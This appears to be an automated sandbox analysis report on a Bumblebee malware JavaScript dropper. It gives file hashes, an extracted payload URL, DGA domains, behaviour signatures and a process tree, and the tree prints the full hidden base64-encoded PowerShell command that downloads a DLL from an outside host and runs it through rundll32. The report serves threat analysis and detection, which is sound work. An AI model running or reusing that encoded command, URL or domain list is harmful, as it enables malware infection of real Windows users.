Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • submitted
    22-10-2024 21:04

General

  • Target

    Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js

  • Size

    42KB

  • MD5

    c77a5b4849df9ec7bdcdf970504c6bf5

  • SHA1

    cea1a6eff08bf3c54eb889af265b0f62f6897cf9

  • SHA256

    3df813c5990e6bf7a841b1ecac9e224903e37a3f8e32d63b9816c3507aab5637

  • SHA512

    a24a3ca285cd942f1170f75ceb23a97c441cf7694b53af8e5c1c880e5ff6bbddde50f78e28a97785276998b5c7646ffccb34d5e2d0f13fe8a85acaa80f8bf98e

  • SSDEEP

    768:2/OWgWxiLG0nMLTYFFd4SCEA4iuxbSHsH0G4SCS64TN+n6AmiY7BTER/Xzb1ql83:zBgR/Xzb1qblhoooLCk+TBUVDiwQ+pa2

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://mycocojamboo.com/bgfhfg/lGmEQCgpfT.dll

Extracted

Family

bumblebee

Botnet

lnk001

Attributes
  • dga

    tvx1ovdepj8.life

    acgr6r8zdot.life

    ilofx941igp.life

    8x2apo5m7ri.life

    x9yrzer0ndt.life

    93j4v4jopzd.life

    ameagxzo2f7.life

    nyy41uibsv5.life

    ru4jvijdytq.life

    l9t6r0y6cvi.life

    f4vb9n3tdvh.life

    9do3mcejztt.life

    pxu1ajsdhqr.life

    7exy2b231n2.life

    vu5b47m18jn.life

    6mnudp7zj73.life

    p5047yjrb8q.life

    d0xtxp89bb9.life

    ygo9u1fkwux.life

    fig3gj0v6qe.life

    38f5wvwwn7o.life

    txgogs9p8a1.life

    uyn0icgx1kv.life

    2z1ls31az7s.life

    0cc2z8zrnhf.life

    fsr2hskx44p.life

    du19ek78tjw.life

    234ct3lkozp.life

    he8fq4k8d3w.life

    7ewh8ltr7il.life

  • dga_seed

    1016365528594956469

  • domain_length

    11

  • num_dga_domains

    100

  • port

    443

rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a loader malware written in C++.

  • Bumblebee family
  • Blocklisted process makes network request 19 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Report_1eed5c99-5474-4156-a3c8-a5537ffea449.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -w hidden -EncodedCommand JAB3AEEAMwBLADAAagB1AEgAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAHkAYwBvAGMAbwBqAGEAbQBiAG8AbwAuAGMAbwBtAC8AYgBnAGYAaABmAGcALwBsAEcAbQBFAFEAQwBnAHAAZgBUAC4AZABsAGwAJwA7ACAAJAB0AEQATgBkAEkAVAA4AG0APQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABzAEQAawBwAEQAMwBJADgAJwA7ACAAJABxAFoAWABkAGEASQBwADIAPQAkAHQARABOAGQASQBUADgAbQArACcAXABkAGwAbABmAGkAbABlAC4AZABsAGwAJwA7ACAAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdABEAE4AZABJAFQAOABtACkAKQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQARABOAGQASQBUADgAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAB9ADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAHcAQQAzAEsAMABqAHUASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABxAFoAWABkAGEASQBwADIAOwAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAJABxAFoAWABkAGEASQBwADIALABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIAdgBlAHIA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3260
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -EncodedCommand JAB3AEEAMwBLADAAagB1AEgAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAHkAYwBvAGMAbwBqAGEAbQBiAG8AbwAuAGMAbwBtAC8AYgBnAGYAaABmAGcALwBsAEcAbQBFAFEAQwBnAHAAZgBUAC4AZABsAGwAJwA7ACAAJAB0AEQATgBkAEkAVAA4AG0APQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABzAEQAawBwAEQAMwBJADgAJwA7ACAAJABxAFoAWABkAGEASQBwADIAPQAkAHQARABOAGQASQBUADgAbQArACcAXABkAGwAbABmAGkAbABlAC4AZABsAGwAJwA7ACAAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdABEAE4AZABJAFQAOABtACkAKQAgAHsAIABOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQARABOAGQASQBUADgAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAB9ADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAHcAQQAzAEsAMABqAHUASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABxAFoAWABkAGEASQBwADIAOwAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAJABxAFoAWABkAGEASQBwADIALABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIAdgBlAHIA
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\sDkpD3I8\dllfile.dll,DllRegisterServer
          4⤵
          • Blocklisted process makes network request
          PID:1556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -C "start https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3168
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://helpx.adobe.com/uk/acrobat/kb/install-updates-reader-acrobat.html
        3⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1968
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd630d46f8,0x7ffd630d4708,0x7ffd630d4718
          4⤵
            PID:1668
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
            4⤵
              PID:1264
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2784
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8
              4⤵
                PID:1160
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                4⤵
                  PID:1888
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                  4⤵
                    PID:3144
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
                    4⤵
                      PID:4716
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3432
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
                      4⤵
                        PID:2844
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
                        4⤵
                          PID:380
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
                          4⤵
                            PID:4136
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
                            4⤵
                              PID:1888
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,8779401221531812491,4540024426326797403,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1296 /prefetch:2
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5856
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:1568
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:2016

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            3KB

                            MD5

                            61e2e57471d559f5f6813c0a7995c075

                            SHA1

                            33c621541bc0892ddab1b65345a348c14af566e5

                            SHA256

                            c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d

                            SHA512

                            9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            443a627d539ca4eab732bad0cbe7332b

                            SHA1

                            86b18b906a1acd2a22f4b2c78ac3564c394a9569

                            SHA256

                            1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

                            SHA512

                            923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            99afa4934d1e3c56bbce114b356e8a99

                            SHA1

                            3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

                            SHA256

                            08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

                            SHA512

                            76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                            Filesize

                            816B

                            MD5

                            575cfcde7332b11b500f391131e6291f

                            SHA1

                            4bb949b996fa76f829c23b4114c65c324102fcf6

                            SHA256

                            b30076e49c143f95700e9da694ea40c102df21fa393e127fb836d4320517bdfb

                            SHA512

                            d699339cdef3e82a80db847af71310c3fa92ed1a11b5ef9aa933ce90f9afbbedd39bc38c005b746fe2b8d4a4749852a7703e7c0bc90a513040299429805a87fd

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                            Filesize

                            1KB

                            MD5

                            550891bb3b717c0748b16cefdc3421fe

                            SHA1

                            0272e629a990d8d0343f39f3f265c07ea242470b

                            SHA256

                            c4b2c630fc4fc8b2e3f0e1142e060d63a4e32d419491be3cb078ee37499792f6

                            SHA512

                            3f6c6a9695ec9e3f0159d974b6f60eb5f03a380cca297c7c82996652876c8b47b75504b4103f06cae1d2e354648b86128d7767122196f4e399a2c05981df4305

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                            Filesize

                            5KB

                            MD5

                            e4739b2bbbade2508a6d1d6235776bb2

                            SHA1

                            08da2d7cc4ab2163928bc31569eab10c9d1fbd23

                            SHA256

                            ef9f813c03f8a1c6b085c98230af1fd5d65866e4c87b936600f99e82859dbd20

                            SHA512

                            376881b542196fd0d16d3c5672bbb96cd302215010e3a67ec5c0057fb0d30654f6d804672efdd52c3933549225328a2d68428912547100fe4d1451234589e80f

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                            Filesize

                            6KB

                            MD5

                            fb3394b1af2dce5e03e8175286b95a64

                            SHA1

                            d56918d16d33edd1a273ccad48b4239ff2cc0400

                            SHA256

                            c892f2136114ee571094f06e9d960faafd6a1b880087196898ad662f98658201

                            SHA512

                            c6213b152e130e58003b4b341a18c41d42b52df13946aa2ce5ff5131237d8d7a8e0d08a36b3b83d2a1cfc44f5435e142eb3394033b21ef8296469bcf840c7b1f

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                            Filesize

                            16B

                            MD5

                            46295cac801e5d4857d09837238a6394

                            SHA1

                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                            SHA256

                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                            SHA512

                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                            Filesize

                            16B

                            MD5

                            206702161f94c5cd39fadd03f4014d98

                            SHA1

                            bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                            SHA256

                            1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                            SHA512

                            0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                            Filesize

                            11KB

                            MD5

                            682fea592a0fafacc67b6fd2b4a2f17e

                            SHA1

                            eeb7ac914c991b3cbc59625577c62cf98f22ff6e

                            SHA256

                            f00c1ee32fd4add83b6ef036eb2af0014fd817d64e26f3528452abf790c28ef9

                            SHA512

                            f07bac059e5efa11a780101d32b19d46989bdcfc29ae0ebcaf70d6eefc9cafa60fc73e7779858c30d9050bbdf6784e1d9eecf357951a3e783b76d2db9e334d6c

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            64B

                            MD5

                            3ca1082427d7b2cd417d7c0b7fd95e4e

                            SHA1

                            b0482ff5b58ffff4f5242d77330b064190f269d3

                            SHA256

                            31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

                            SHA512

                            bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k0a1yldi.fr4.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • memory/1556-32-0x0000017D68F30000-0x0000017D69149000-memory.dmp

                            Filesize

                            2.1MB

                          • memory/1556-33-0x0000017D68F30000-0x0000017D69149000-memory.dmp

                            Filesize

                            2.1MB

                          • memory/1556-31-0x0000017D68F30000-0x0000017D69149000-memory.dmp

                            Filesize

                            2.1MB

                          • memory/2428-23-0x000001ADF8600000-0x000001ADF8614000-memory.dmp

                            Filesize

                            80KB

                          • memory/2428-22-0x000001ADF8380000-0x000001ADF83A6000-memory.dmp

                            Filesize

                            152KB

                          • memory/3260-0-0x00007FFD6D403000-0x00007FFD6D405000-memory.dmp

                            Filesize

                            8KB

                          • memory/3260-30-0x00007FFD6D400000-0x00007FFD6DEC1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3260-24-0x00007FFD6D403000-0x00007FFD6D405000-memory.dmp

                            Filesize

                            8KB

                          • memory/3260-12-0x00007FFD6D400000-0x00007FFD6DEC1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3260-11-0x00007FFD6D400000-0x00007FFD6DEC1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3260-1-0x000002BDF9620000-0x000002BDF9642000-memory.dmp

                            Filesize

                            136KB